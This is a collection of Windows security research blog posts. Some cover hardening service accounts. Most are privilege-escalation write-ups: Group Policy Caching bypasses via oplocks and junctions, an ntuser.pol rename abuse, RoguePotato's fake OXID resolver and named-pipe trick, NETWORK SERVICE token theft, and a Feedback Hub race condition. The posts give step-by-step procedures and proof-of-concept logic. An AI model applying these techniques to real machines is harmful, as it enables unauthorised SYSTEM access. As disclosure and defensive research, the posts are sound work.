He is still member of IIS_IUSRS and IIS APPPOL\MyAppPool, so in order to remove our unwanted privileges, in the Group Policy Editor we have to:

  • Remove IIS_IUSRS from “Impersonate a Client after Authentication”
  • Remove IIS APPPOL\MyAppPool from “Replace a process level token”
  • restart the IIS services and observe the result..

Yes! privileges are no longer present, and is confirmed by listing the w3wp process tokens:

Now we can be more comfortable given that we have secured these accounts, isn’t it? Well … not exactly.. there are still a lot af nasty things you can do in session 0 .. more about this maybe in a future post 😉

Hands off my service account!

By: Decoder
5 November 2020 at 20:45

Windows service accounts are one of the preferred attack surface for privilege escalation. If you are able to compromise such an account, it is quite easy to get the highest privileges, mainly due to the powerful impersonation privileges that are granted by default to services by the operating system.

Even if Microsoft introduced WSH (Windows Service Hardening), there isn’t much you can do to “lower” the power of standard Windows services, but if you need to build or deploy a third-party service you can definitely strengthen it by using WSH.

In this post I will show you some useful tips.

Make use of Virtual accounts

Obviously a service must be run with a specific account. There are some built-in Windows accounts like SYSTEM (oh no !!), Local Service, and Network Service. But there is also the ability to use Virtual Accounts (I won’t write about “Group Managed Service Accounts” in this post) which are self-managed (no need to deal with passwords) and you can grant specific permissions by setting the correct ACL’s on the resources. This allows you to isolate the service and in case of compromise, they can only access the resources you have allowed. Virtual accounts can also access network resources, but in this case they will impersonate the computer account (COMPUTERNAME$)

Configuring Services with Virtual Accounts

First of all, you don’t need to create VSAs, when the service is installed, a matching account is automatically created for you in the form:

NT SERVICE\<service name>

all you need is to assign the account to your service:

Don’t forget to leave the password field blank!

Restricting access to Virtual Accounts

Now that your service runs under a specific account and not a generic one like Local Service or Network Service , you can implement fine-grained access control on resources like files and directories:

Removing unnecessary privileges

Impersonation privileges are a nightmare, so if your service doesn’t need to impersonate, why should we grant them to this service user?

Is it possible to remove this default privilege? There is a good news, yes! We can configure the privileges directly in registry or by using the “sc.exe” command:

And these values will be written into registry:

Let’s see if the the privilege is removed:

Oh yes! The dangerous privilege has been removed and it’s no more possible to get him back, for example using @itm4n ‘s trick described in this great post.

Write Restricted Token

If you add this extra group to your service tokens, you can further limit the permissions of your service account.

This means that by default you can only read or execute resources unless you explicitly grant write access:

A great research about write restricted tokens can be found in Forshaw’s post

Conclusions

I hope that this very short post can be useful for us who must secure our Windows Sytems (Offensive sec is just a joke for me 🙂 )

In the next post I will show you how to remove impersonation privileges in other critical services… stay tuned

UPDATE

Following Forshaw’s recent blog post and hint and his post on “Sharing a Logon Session a Little Too Much“ I can confirm that you gain back your privileges with the “loopback pipe trick”. This is possible because you will get the original token stored in LSASS without stripped privileges by the Service Control Manager. So the only solution to prevent this is to associate a Write restricted Token to your service?

Well not exactly … -> https://bugs.chromium.org/p/project-zero/issues/detail?id=2194

The use of WRITE RESTRICTED is considered by Microsoft to be of primary use for mitigating ambient privilege attacks 😦

That’s all 😉

When a stupid oplock leads you to SYSTEM

By: Decoder
27 October 2020 at 17:26

As promised in my previous post, I’m going to show you the second method I found in order to circumvent CVE-2020-1317.

Prerequisites

  1. Domain user has access to a domain joined Windows machine
  2. Domain user must be able to create a subdirectory under “Datastore\0” which is theoretically no more possible. But as we will see there are at least two method to bypass the limitation.

First Method: “Domain Group Policy” abuse

We will implement a Domain User Group Policy which produces “files”, typically script files such as Logon/Logoff scripts or configuration preferences xml files. This is a very common scenario in AD enterprise domains

Steps to reproduce

  • In this case we are going to configure user preferences under “User Configuration\Preferences\Windows Setting” in Group Policy Management. But it’s just an example, logon/logoff scripts will work too.
  • On the Domain Controller create a Domain preferences policy (for example “Ini Files”)

  • Login with domain user credentials on a domain joined computer
  • Check if the “Group Policy Cache” has been saved under the directory:
    • C:\programdata\microsoft\GrouPolicy\users\<SID>\Datastore (the entire directory, subdirectories and files are read-only for users after CVE-2020-1317)
    • If not, perform a “gpupdate /force” via command prompt
  • We can observe that the preference “inifiles.xml” has been created  
  • Now we will place an exclusive “oplock” [1] on this file:

  • On a new command prompt, we will force a new “gpupdate /force”. Oplock will be triggered and policy processing hangs:
  • Here comes the fun part(!), when Group Policy Caching is processed, the “gpsvc” service, running as SYSTEM, lists all the files and folders starting from the local “DataStore” root directory and performs several “SetSecurity” operations on subfolders and files. The first “SetSecurity” will always grant “Full control” to the current user, the second one only read access. This is the first run and we should have full control over the “Datastore” folders. In a new command prompt, we will try to create a directory under “Datastore\0” folder:
  • Once created, we disable inheritance and remove permissions to SYSTEM and Administrator Group. Why? Because when we release the “oplock”, the “second run” will occur during which the domain user will be granted read only access. Given that the process is running as SYSTEM, this operation will be denied. This can be observed in following procmon screenshot:
  • Now we have a directory with full control where we can place a symlink via \RPC Control to a SYSTEM protected file… and, just as an example, alter the contents of “printconfig.dll”, start an XPS Print job and gain a SYSTEM shell, as described in previous blog posts [3]

Second Method: redirect Windows Error Processing “ReportQueue” directory

In this case we are going to redirect the “C:\ProgramData\Microsoft\Windows\WER\ReportQueue” folder to the “Datastore\0” directory. This folder is normally empty if no error reporting process is running.

Steps to reproduce

  • Create the junction. In this case we are using CreateMountPoint.exe[3] , we can also use the built-in “mklink /j “ command but we need to remove the directory before

  • Ensure that optional diagnostics data etc..  has been turned on in Settings->Privacy->Diagnostics&feedback
  • Launch “Feedback Hub” and report a problem. Remember to check “Save a local copy…”
  • You will observe that the redirected “ReportQueue” directory will be populated. As soon as this happens, perform a “gpupdate /force”
  • Once the update has finished, you will be able to create a directory under the “Datastore\0” folder. At this point, you can proceed with same technique explained before

Conclusions:

I think to have successfully demonstrated that even after CVE-2020-1317 bug fix, there were still several possibilities to abuse junctions and Set Security calls in group policy client in order to perform an elevation of privilege starting from a low privileged domain user.

That’s all 😉

When ntuser.pol leads you to SYSTEM

By: Decoder
24 October 2020 at 16:32

This is a super short writeup following my previous post . My last sentence was a kind of provocation because I already knew that there were at least 2 “bypasses” for CVE-2020-1317.

I did not submit them because I totally disagree with recent MSRC changes in their policies, so when I discovered that they were fixed with latest security updates I decided to share my findings.

So here we are, this is the first one (next to come hopefully soon). I won’t dig too much in details. Let’s start from Group Policy caching again. This “feature” is enabled by default but can be turned off and in Windows Servers it’s disabled by default.

When GP Caching is disabled a new privilege escalation is possible (more on this later). If certain policies are configured, the file “ntuser.pol” is written in c:\programdata\microsoft\grouppolicy\users\<sid>.

The domain user has Full Control (!) over this directory and on ntuser.pol too. The file has hidden and system attributes but we can of course remove them..

Let’s see what happens with procmon..

This is interesting!

The file ntuser.pol is renamed to tempntuser.pol by the group policy service running as SYSTEM. Got it? At the end “tempntuser.pol” is deleted:

So we can obviously perform an “arbitrary delete” by abusing our so loved symlinks via “\RPC Control” but the rename operation can permit us to write a file (with filename and contents under our control) with SYSTEM privileges and that’s a real EoP! We also need to inhibit the file deletion, otherwise our file won’t exist any more at the end of the process.

The procedure is rather simple, I think that this simple batch file is more than sufficient 🙂

test.dll” is our “source” file that we will put in a directory where we have full control, because during move operations, the file maintains his source ACL

The “poc.exe” simply waits until the file is created in our target directory and then places an oplock in order to prevent the deletion (which will fail because of sharing violations)

And at the very end we have our file written in System32 with full control over it!!

But why do we have full control under the <SID> directory? Well, what I observed is that when group policy caching is enabled, a “Datastore” sub-directory is created and correct permissions are then set.. (see also my previous post)

That’s all 😉

Abusing Group Policy Caching

By: Decoder
23 September 2020 at 20:20

In this post I will show you how I discovered a severe vulnerability in the so-called “Group Policy Caching” which was fixed (among other GP vulnerabilities) in CVE-2020-1317

A standard domain user can perform, via the “gpsvc” service,  arbitrary file overwrite with SYSTEM privileges  by altering behavior of “Group Policy Caching”.

Cool, isn’t it?

The “Group Policy caching” feature is  configurable since Windows 2012/8, here you can learn more about it: https://specopssoft.com/blog/things-work-group-policy-caching/

For our goal, all you need is just a domain user and at least the “Default Domain” policy with no special configuration and no special settings in “Group Policy Caching” are needed. Only default configurations 😉

The “Group Policy caching files” are stored under subfolders:

  • C:\users\<domain_user>\AppData\Local\GroupPolicy\datastore\0

Each time a standard domain user performs ” a gpupdate /force”, the directory is created (if it doesn’t exist) and then populated depending on the group policies which are applied.

The domain user has full control over the “Datastore” directory but only read access under the “0” subfolder.

This can be easilly overriden, if we just rename the “Datastore” folder and create a new “Datastore” folder with the “0” subfolder.

Now let’s create a file in the “0” folder:

and then run a “gpupdate /force” watching what happens in procmon:

As we can see, the file is opened without impersonation (SYSTEM) and 2 SetSecurity calls are made. The resulting perms on the test file are:

Very strange, we lost the full control over the file, probably the second SetSecurity call, but the first one?

Let’s move a step forward, now we create a junction under the “0” folder pointing to a protected directory, for example: “c:\users\administrator\documents”

Note: We obviously need to rename the actual “Datastore” folder and create a new one with the “0” subfolder given that now we have again only read access

Again, in procmon let’s see what happens with a new “gpupdate /force”

A first SetSecurity call is done on “desktop.ini” and then the processing stops due to an access denied on “MyMusic”.

What will be the resulting perms of “desktop.ini”.. ? Guess what, full control for our user!

Now we have a clear vision of the whole picture:

When Group Policy Caching is processed, the “gpsvc” service, running as SYSTEM, lists all the files and folders starting from the local “DataStore” root directory and performs several “SetSecurity” operations on subfolders and files. The first “SetSecurity” will always grant “Full control” to the current user, the second one only read access.

Being able to obtain full control over a SYSTEM protected file (during the first SetSecurity call) EoP should be super-easy, don’t you agree?

For example, we can alter the contents of “printconfig.dll”, start an XPS Print job and gain a SYSTEM shell, as described in my post: https://decoder.cloud/2019/11/13/from-arbitrary-file-overwrite-to-system/

To achieve my goal, I created a very simple POC, here the relevant parts:

When the targetfile is accessed, an “opportunistic lock” is set and after the new junction is moved to “\RPC Control” which will in fact stop the processing and the second SetSecurity call.

Our domain user now has full control over the file!

Microsoft fixed this security “bug” by simply moving the “Group Policy” folders under c:\programdata\microsoft\grouppolicy\users\<sid> which is readonly for standard users….

That’s all 🙂

gp0

decoderblogblog

The impersonation game

By: Decoder
30 May 2020 at 15:23

I have to admit, I really love Windows impersonation tokens! So when it comes to the possibility to “steal” and/or impersonate a token I never give up!

This is also another chapter of the never ending story of my loved “JuicyPotato”.

 So, here we are (refer to my previous posts in order to understand how we arrived a this point):

  • You cannot specify a custom port for OXID resolver address in latest Windows versions
  • If you redirect the OXID resolution requests to a remote server on port 135 under your control and the forward the request to your local Fake RPC server, you will obtain only an ANONYMOUS LOGON.
  • If you resolve the OXID Resolution request to a fake “RPC Server”, you will obtain an identification token during the IRemUnkown2 interface query.

The following image should hopefully describe the “big picture”

 

But why this identification token and not an impersonation one? And are we sure that we will always get only an identification token? We need at least an impersonation token in order to elevate our privileges!

But first of all we need to understand who/what is generating this behavior. A network capture of the NTLM authentication could help:  

The verdict is clear: in the first NTLM message, the client sets the “Identify” flag, which means that the server should not impersonate the client.

Side Note: Don’t even try to change this flag (remember, we are doing kind of MITM attack in local NTLM Authentication, so we could alter the value), the client would not answer to our NTLM type 2 message!

But why does the client activate this flag? Well, probably it’s all in this RPC API client call setup:

RPC_STATUS RpcBindingSetAuthInfoExA( 
RPC_BINDING_HANDLE Binding, 
RPC_CSTR ServerPrincName, 
unsigned long AuthnLevel, 
unsigned long AuthnSvc, 
RPC_AUTH_IDENTITY_HANDLE AuthIdentity, 
unsigned long AuthzSvc, 
RPC_SECURITY_QOS *SecurityQos 
);

More precisely in this structure:

typedef struct _RPC_SECURITY_QOS {
unsigned long Version; 
unsigned long Capabilities; 
unsigned long IdentityTracking; 
unsigned long ImpersonationType; 
} RPC_SECURITY_QOS, *PRPC_SECURITY_QOS;

The client can define the desidered impersonation level before connecting to server. At this point we can assume that this is the default:

ImpersonationType=RPC_C_IMP_LEVEL_IDENTIFY

for the COM security settings when svchost services starts the DLL inside svchost.exe.

This is also controlled in a registry key (thanks to @tiraniddo for remembering me this)  located in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost where the impersonation level can be defined overriding the default value.

In the following screen shot we can observe that all services belonging to “print” group will call the CoInitializeSecurity function with Impersonation level =3 (Impersonate)

And which service belongs to this group?

It’s the “PrintNotify” service, which can be instantiated and accessed by the following DCOM server:

Ok, let’s see what happens on a fully patchted Win10 1909 if we try to initialize this object via the IStorageTrigger, redirect to our fake OXID resolver and then intercept he authentication callbacks.

The first request with ANONYMOUS logon is relative to the redircted OXID resolution request. The two subsequent are generated by the IremUnknown2 queries, and this time we have impersonation tokens from SYSTEM!

And according to the registry configuration, we can see that the Impersonation parameter is read from the registry:

But wait, there is still another problem:

The SERVICE user’s group (which is typically the users we will “target” because they have impersonation privileges) cannot start/launch the sevice/dll and does not belong to the INTERACTIVE group.

Again, no way? Well not exactly.

With my modified JuicyPotato – juicy_2 (see previous screenshot) running as “NT AUTHORITY\Local Service”, I tested all CLISD’s (7268 in my Windows 10 1909) in order to find something else and this is the result:

There were 2 other CLSIDS which impersonate LOCAL SYSTEM:

  1. {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} which is hosted by the obsolete ActiveX Installer service:


This service belongs the “AxInstSVGroup” group, but surprisingly this group is not listed in the registry, so I would expect an Identification token! This means that the previous assumption is not always true, the impersonation level is not exclusively controlled via registry configuration…

2. {C41B1461-3F8C-4666-B512-6DF24DE566D1} This one does not belongs to a specific service but is related to an Intel Graphics Driver “IntelCpHeciSvc.exe” which hosts a DCOM server.




Clearly, the presence of this driver depends on the HW configuration of your machine.

The other CLISD’s impersonates the interactive user connected to first Session:

{354ff91b-5e49-4bdc-a8e6-1cb6c6877182 }- SpatialAudioLicenseServerInteractiveUser

{38e441fb-3d16-422f-8750-b2dacec5cefc}- ComponentPackageSupportServer

{f8842f8e-dafe-4b37-9d38-4e0714a61149} – CastServerInteractiveUser

So if you have impersonation privileges and an admin is connected interactively you could obtain his token and impersonate.

I did the same test on the CLSID’s of a Windows 2019 Server but this time was not able to get a SYSTEM impersonation token. The ActiveX Installer service is disabled by default on this OS. The only valid CLSID’s were the 3 relative to interactive user.

Well that’s all for now, the Impersonation game never ends 😉

.. and thanks to @splinter_code

Source code can be found here

Capture.PNG

decoderblogblog

No more JuicyPotato? Old story, welcome RoguePotato!

By: Decoder
11 May 2020 at 14:55

 

After the hype we (@splinter_code and me) created with our recent tweet , it’s time to reveal what we exactly did in order to get our loved JuicyPotato kicking again… (don’t expect something disruptive 😉 )

We won’t explain how the *potato exploits works, how it was fixed etc etc, there is so much literature about this and google is always your best friend!

Our starting point will be the “RogueWiRM” exploit.

In fact, we were trying to bypass the OXID resolver restrictions when we came across this strange behavior of BITS. But what was our original idea?

“(…) we found a solution by doing some redirection and implementing our own “Oxid Resolver” . The good news is that yes, we got a SYSTEM token! The bad one: it was only an identification token, really useless

Short recap

  • You try to initialize a DCOM object identified by a particular CLSID from an “IStorage Object” via standard marshalling (OBJREF_STANDARD)
  • The “IStorage” obect contains, among other things, the OXID, OID, and IPID parameters needed for the OXID resolution in order to get the needed bindings to connect to our DCOM object interfaces. Think about it like sort of DNS query
  • From “Inside COM+: Base Services”: The OXID Resolver is a service that runs on every machine that supports COM+. It performs two important duties:
    • It stores the RPC string bindings that are necessary to connect with remote objects and provides them to local clients.
    • It sends ping messages to remote objects for which the local machine has clients and receives ping messages for objects running on the local machine. This aspect of the OXID Resolver supports the COM+ garbage collection mechanism.
  • OXID resolver is part of “rpcss” service and runs on port 135. Starting from Windows 10 1809 & Windows Server 2019, its no more possible to query the OXID resolver on a port different than 135
  • OXID resolutions are normally authenticated.  We are only interested in the authentication part, which occurs via NTLM in order to steal the token, so we can specify in our case for OXID, OID and IPID just 32 random bytes.
  • If you specify a remote OXID resolver, the request will be processed with an “ANONYMOUS LOGON“.

So what was our idea in our previous experiments?

  • Instruct the DCOM server to perform a remote OXID query by specifying a remote IP in the binding strings instead of “127.0.0.1”. This is done in the “stringbinding” structure
  • On the remote IP where is running a machine under our control, setup a “socat” listener (or whatever you prefer) for redirecting the OXID resolutions requests to a “fake” OXID RPC Server, created by us and  listening on a port different from 135. The fake server can run on the same Windows machine we are trying to exploit, but not necessary.
  • The fake OXID RPC server implements the “ResolveOxid2” server procedure
  • This function will resolve the client (ANONYMOUS LOGON) query  by returning the  RPC bindings which will point to another “fake” RPC server listening on a dedicated port under our control hosted on the victim machine.
  • The DCOM server will connect to the RPC server in order to perform the IRemUnkown2 interface call. By connecting tho the second RPC Server, an “Autentication Callback” is triggered and if we have SE_IMPERSONATE_NAME privileges, we can impersonate the caller via RpcImpersonateClient() call
  • And yes, it worked! We got a SYSTEM token coming from BITS service in this case, but unfortunately it was an Identification token, really useless.

The good news

So we abandoned the research until some days ago, when two interesting exploits/bugs had been published:

  1. Sharing a Logon Session a Little Too Much published by @tiraniddo . You can also find in this blog  the  post along with a working POC in order to demonstrate how it was possible for the NETWORK SERVICE Account to elevate privileges (bug/feature?)
  2. The marvellous “Print Spoofer” exploit published by @itm4n. In this case (and for our scenario) not for the exploit itself but for the “bug” in the named pipe path validation checks.

On a late evening of some days ago, @splinter_code sent me a message:

(@splinter_code) “If we resolve the fake OXID request by providing an RPC binding with  our named pipe instead of the TCP/IP sequence, we should in theory be able to impersonate the NETWORK SERVICE Account and after that… SYSTEM is just a step beyond…”

(me) “Yeah, sounds good, let’s give it a try!”

And guess what? IT WORKED!!!

Let’s dig into the details.

The “fake” OXID Resolver

First of all a  little bit of context on how the OXID resolution works is required to understand the whole picture.
This is how the flow looks like, taken from msdn :

OXID resolution sequence

The client will be the RPCSS service that will try to connect to our rogue oxid resolver (server) in order to locate the binding information to connect to the specified dcom.

Consider that all the above requests done by the client in the OXID resolution sequence are authenticated (RPC Security Callback) impersonating the user running the COM behind the CLSID we choose (usually the one running as SYSTEM are of interests).
What *potato exploits does is intercepting this authentication and steal the token (well technically is a little bit more complicated because the authentication is forwarded to the local system OXID resolver that will do the real authentication and *potato will just alter some packets to steal the token… a classic MITM attack).
When this is done over the network (due to the MS fix) this will be an Anonymous Logon so quite useless for an EoP scenario.

Our initial idea was to exploit one of the OXID resolver (technically called IObjectExporter) method and forge a response that could trigger a privileged authentication to our controlled listener.

Looking at the scheme above 2 functions caught our attention:

So the first request was not of our interest because we couldn’t  specify endpoint information (that’s what we needed) so we were always answering with a response of RPC_S_OK. This is an example of what a standard response looks like:

serveralive2_pcap

So we focused in the next one (ResolveOxid2) and what we saw is something interesting that we could abuse:

resolveoxid2_pcap

Observing the above traffic, that is a standard response captured on the real OXID resolver on a windows machine, we quickly spot that we could abuse this call by forging our own ResolveOxid2 response and specify as an endpoint our controlled listener.
We can  specify endpoint information in the format ipaddress[endpoint] and also the TowerId (more on that later).

But… Why not registering the binding information we require on the system OXID resolver, getting the OID and OXID from the system and ask the unmarshalling of that?
Well as our knowledge the only way to do that is by registering a CLSID on the system and to do that you need Administrator privileges.

So our idea was to implement a whole OXID resolver that would answer always with our listener binding for any oxid oid it will receive, just a Fake OXID resolver.

Let’s analyze the function ResolveOxid2 to understand how to forge our response:

[idempotent] error_status_t ResolveOxid2(
   [in] handle_t hRpc,
   [in] OXID* pOxid,
   [in] unsigned short cRequestedProtseqs,
   [in, ref, size_is(cRequestedProtseqs)] 
     unsigned short arRequestedProtseqs[],
   [out, ref] DUALSTRINGARRAY** ppdsaOxidBindings,
   [out, ref] IPID* pipidRemUnknown,
   [out, ref] DWORD* pAuthnHint,
   [out, ref] COMVERSION* pComVersion
 );

What we need to do is to fill the DUALSTRINGARRAY ppdsaOxidBindings with our controlled listener.
Well that was a little bit tricky, but it is well documented by MS (in 1 and 2) so it was just a matter of trial and errors to forge the right offsets/sizes for the packet.

Let’s recap, we can redirect the client to our controlled endpoint (aNetworkAddr) and we can choose the protocol sequence identifier constant that identifies the protocol to be used in RPC calls (wTowerId).

There are multiple protocols supported by RPC (here a list).

In the first attempt we tried ncacn_ip_tcp, as TowerId, that allows RPC straight over TCP.
We run an RPC server (keep in mind that a “standard” user can setup and register an RPC Server) with the IRemUnknown2 interface and tried to authenticate the request in our SecurityCallback calling RpcImpersonateClient.
Returning ncacn_ip_tcp:localhost[9998] in the ResolveOxid2 response, an authentication to our RPC server (IRemUnknown2) were triggered, but unfortunately was just an identification token…

iremunkown2

 

So that was a dead end… But what about “Connection-oriented named pipesncacn_np ?

The named pipe Endpoint mapper

First of all what is the “epmapper” ? Well it’s related to the “RpcEptMapper” service. This service resolves “RPC interfaces identifiers to transport endpoints”.  Same concept as OXID Resolver, but for RPC.

The mapper runs also on TCP port 135 but can also be queried via a special named pipe “epmapper”.

This service shares the same process space as the “rpcss” service and both of them run under the NETWORK SERVICE account.  So if we are able to impersonate the account under this process we can steal the SYSTEM token (because this process hosts juicy tokens)…

The first try we gave was to return a named pipe under our control in the ResolveOxid2 response:

ncacn_np:localhost[\pipe\roguepotato]

But observing the network traffic the RPCSS still connected to the \pipe\epmapper . This is because, by protocol design, the named pipe epmapper must be used, and this is obviously a “reserved” name:

Capture

No way…

When we read the PrintSpoofer post we were impressed by clever trick of the named pipe validation path bypass (credits to @itm4n and @jonasLyk) where inserting ‘/’ in the hostname will be converted in partial path of the named pipe!

With that in mind we returned the following binding information:

ncacn_np:localhost/pipe/roguepotato[\pipe\epmapper]

And you know what? The RPCSS were trying to connect to nonexistent named pipe \roguepotato\pipe\epmapper :

named_pipe_not_found

Great! So we setup a pipe listener on \\.\pipe\roguepotato\pipe\epmapper, got the connection and impersonated the client. Then we inspected the token with TokenViewer :

token_viewer

So we had an Impersonation token of the NETWORK SERVICE account and also the LUID of the RPCSS service! 

Why that? Well, the answer was in the post mentioned above:

if you can trick the “Network Service” account to write to a  named pipe over the “network” and are able to impersonate the pipe, you can access the tokens stored in RPCSS service

All the “magic” about the fake ResolveOxid2 response is happening in this piece of code:

resolveoxid2

The Token “Kidnapper”

Perfect! Now we just needed to perform the old and well known Token Kidnapping technique to steal some SYSTEM token from the RPCSS service.

We setup a minimalist “stealer” which performs the following operations:

  • get the PID of the “rpcss” service
  • open the process, list all handles and for each handle try to duplicate it and get the handle type
  • if handle type is “Token” and token owner is SYSTEM, try to impersonate and launch a process with CreatProcessAsUser() or CreateProcessWithToken()
  • In order to get rid of the occasional “Access Denied” when trying to launch a processes in Session 0, we also setup the correct permissions for the Windows Station/Desktop 

Well, let’s unleash RoguePotato and see our SYSTEM shell popping 😀

system_privs

Final Thoughts

Probably you are a little bit confused at this point, let’s do a recap. Under which circumstances can I use this exploit to get SYSTEM privileges?

  • You need a compromised account on the victim machine with Impersonate privileges (but this is the prerequisite for all these type of exploits). A common scenario is code execution on default IIS/MSSQL configuration.
  • If you are able to impersonate NETWORK SERVICE account or if the “spooler” service is not stopped you can first try the other exploits mentioned before…
  • You need to have  a machine under your control where you can perform the redirect and this machine must be accessible on port 135 by the victim  
  • We setup a POC with 2 exe files. In fact it is also possible to launch the fake OXID Resolver in standalone mode on a Windows machine  under our control when the victim’s firewall won’t accept incoming connections.
  • Extra mile: In fact, in the old *potato exploit, an alternate way for stealing the token was just to setup a local RPC listener on dedicated port instead of forging the local NTLM Authentication,  RpcImpersonateClient() would have done the rest.

To sum it up:

flow_graph_2

You can find the source code and POC of RoguePotato here.

Final note: We didn’t bother to report this “misbehavior?” to MS because they stated that elevating from a Local Service process (with SeImpersonate) to SYSTEM is an “expected behavior”. (RogueWinRm – Disclosure Timeline)

That’ all 😉

@slpinter_code, @decoder_it

Capture

decoderblogblog

OXID resolution sequence

serveralive2_pcap

resolveoxid2_pcap

iremunkown2

Capture

named_pipe_not_found

token_viewer

resolveoxid2

system_privs

flow_graph_2

From NETWORK SERVICE to SYSTEM

By: Decoder
4 May 2020 at 15:58

In the last period, there have been several researches on how to escalate privileges by abusing generic impersonation privileges usually assigned to SERVICE accounts.

Needless to say,  a SERVICE account is required in order to abuse the privileges.

The last one, in order of time, “Printer Spoofer” is probably the most dangerous/useful because it only relies on the “Spooler” service which is enabled by default on all Windows versions.

In Windows 10 and Windows Server where WinRM is not enabled, you can use our “Rogue WinRM listener” in order  to capture a SYSTEM token.

And of course, in Windows Server versions 2016 and Windows 10 up to 1803, our Rotten/Juicy Potato is still kicking!

In this post I’m going to show you how it is possible to get SYSTEM privileges from the Network Service account, as described in Forshaw’s post “Sharing a Logon Session a Little Too Much“. I suggest you to read it before if not already done as I won’t detail the internal mechanism.

In short, if you can trick the “Network Service” account to write to a  named pipe over the “network” and are able to impersonate the pipe, you can access the tokens stored in RPCSS service (which is running as Network Service and contains a pile of treasures) and “steal” a SYSTEM token. This is possible because of some “weird” cheks/ assignments  in token’s Authentication ID.  The token of the caller (coming from RPCSS service) will have assigned the Authentication ID of the  service and if you impersonate this  token you will have complete access to RPCSS process, including his tokens. (because the impersonated  token belongs to group “NT Service\RpcSs “)

Side note: here you can find some other “strange” behaviors based on AuthID.

Given that the local loopback interface (127.0.0.1) is considered a network logon/access, it’s possible to exploit this (mis)behavior locally with an all-in-one tool.

The easiest way is a compromised “Network Service” account with a shell access and this will be our starting point. In this situation, we can directly write via the loopback interface to the named pipe, impersonate and access RPCSS process tokens.

Note: For testing purpose, you can impersonate the “Network Service” account using psexec from an admin shell:

  • psexec64 -i -u “NT AUTHORITY\Network Service” cmd.exe

There are many ways to accomplish this task, for example with Forshaw’s NTOBJECTMANAGER library in Powershell (keep in mind that the latest MS Defender updates marks this library as malicious!??)

But my goal was to create a standalone executable in old plain vanilla style and given that I’m very lazy, I found most of the functions needed in the old but always good incognito2 project. The source code is very useful and educational, it’s worth the study.

I reused the most relevant parts of code and did some minor changes in order to adpapt it to my needings and also to evade AV’s.

Basically this is what it does:

  • start a Named Pipe Server listening on a “random” pipe
  • start a Pipe Client thread, connect to  the random pipe via “localhost” and write some data
  • In the pipe server, once the client connects, impersonate the client (coming from “RPCSS”)
  • List tokens of all processes:Capture
  • If a SYSTEM token is available , impersonate it  and execute your shell or whatever you prefer:

Cattura

 

The “adapted” source code for my POC can be found here: https://github.com/decoder-it/NetworkServiceExploit

That’s all 😉

 

Capture

decoderblogblog

Capture

Cattura

Exploiting Feedback Hub in Windows 10

By: Decoder
28 April 2020 at 15:36

Feedback Hub is  a feature in Windows 10 which allows users to report problems or suggestions to Microsoft. It relies ond he “diagtrack” service, running as SYSTEM, or better known as “Connected User Experiences and Telemetry”

When the Feedback Hub gathers info in order to send them to MS, it does a lot of file operations, most of them performed by the SYSTEM user. It turns out that this application and the related services/executables which are run during the collection have a lot of logical bugs which can be exploited by “Directory Junctions” or Symbolic links via RPC Control.

These “bugs” could permit a malicious user to perform the following operations:

  • Arbitrary File Read (Information Disclosure)
  • Arbitrary File Overwite with contents not controlled by the Attacker (Tampering)
  • Arbitrary File Overwite/Write with contents  controlled by the Attacker (Elevation of Privilege)
  • Arbitrary File/Folder Deletion (Elevation of Privilege)

In my investigations, I was able o perform all these operations in various circumstances.

Today I’m going to show you how it is possible to perform an Arbitrary File Overwite/Write which could easily lead to EoP.  I found this issue in Windows 10 Preview up to Build v10.0.19592.1001. In Windows 10 “standard” version, the bug was much easier to exploit.

This issue was fixed in an “unintended” way in CVE-2020-0942  and sequent in latest WIP Build (10.0.19608.1006).

Prerequisites

  • Standard Windows 10 / domain user with Windows 10 computer (virtual or physical)
  • Diagnostics & Feedback has to be set to “Full” mode
    • If “Basic” was selected at the first logon this can be changed by the logged on user in settings->privacy->diagnostics& feedback by switching from “required” to “optional”

Description

When an attachment is sent via the Feedback Hub App and you choose to “Save a local copy…”, several file operations are performed by the diagtrack service, mostly using SYSTEM user privileges.

cattura.JPG

 

Here is an overview of the most significant operations.

First, diagtrack service by impersonating the current user creates a temporary random folder name diagtracktempdir<XX..X> under the “c:\Users\user\Appdata\local\temp” directory:

cattura.JPG

During the creation of the directory, the impersonated user also sets new permissions. These are not inherited from the parent folder and are very restrictive. In fact, as we can see in the following screenshot, permissions in the current directory do not include the current user:

cattura.JPG

While, for the subdirectories and files inside, the current user has some privileges.

cattura.JPG

In the next screenshot we can observe that files and folders are created without user impersonation and therefore as SYSTEM. It should also be noticed that even the file uploaded as feedback attachment (windowscoredeviceinfo.dll in this case) is now copied in the temporary folder. Additionally, all the files and folders created or copied in the temporary path will inherit these new permissions.

cattura.JPG

Once the process is complete, diagtracktempdir<XX..X> is renamed and moved into the current user FeedbackHub path. Sequent, restrictive permissions are again set on first directory of the renamed folder:

cattura.JPG

 

So the question is:

Is it still possible to abuse from special crafted “junction”?

Theoretically yes: the primary folder diagtracktempdir<XX..X> is created by the current user. Even though the permissions are sequent changed in a more restrictive way, such as granting the user only READ permissions, he could still modify because the user is the owner of the directory.

Practically, there is a race condition to win. Specifically, permissions on diagtracktempdir<XX..X> have to be changed before the subdirectories are created by SYSTEM without impersonation. In this way, the new permissions will be propagated, and the attacker will have full access on all of content.

Winning such a race conditions is hard. The time between the two events is in the order of milliseconds and you have to inject your “malicious” code for altering the permissions…

cattura.JPG

 

Nevertheless, I found a couple  solutions to win the race conditions and developing a POC/tool in VS2019 C++

Note: In order to speed up the tests, always choose “Suggest a feature” in Feedback Hub.

Only 1 Hard disk present

I tested this procedure on both physical and virtual machines. Depending on the HW, performance and current workload, I was able to perform the exploitation at first run. In some cases, it took up to 10/15 attempts.

First of all, run the “Feedback Hub” app and exit. This will create the initial directory and settings if never launched before.

This is the “Logical Flow” of my Poc/Tool:

  • Thread 1: Run a file watcher for the directory: “c:\users\<user>\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\LocalState\DiagOutputDir”
    this will intercept the creation of a directory and save the directory {GUID} useful for later
  • Thread 2: Run a file watcher for the directory “c:\users\<user>\appdata\local\temp”
    this will intercept the creation of folder diagtracktempdir<XX..X>
    • When the directory is created, change immediately the permissions, e.g.: everyone:full.
      Note: SetSecurityInfo API function is not suitable because slow (it does a lot of useless work “under the hood”), NtSetSecurityObject is faster because more “atomic”
    • We know how the final path name will look like:
      “diagtracktempdir<XX..X>\get info T0FolderPath\<{GUID}>”
  • Loop to create a “junction point” from the identified path to our target directory. Loop until the error is “path/file not found”.

If everything works fine, we should have copied our file in the destination directory. Alternatively, the loop will exit with an access denied error which means that we were too late.

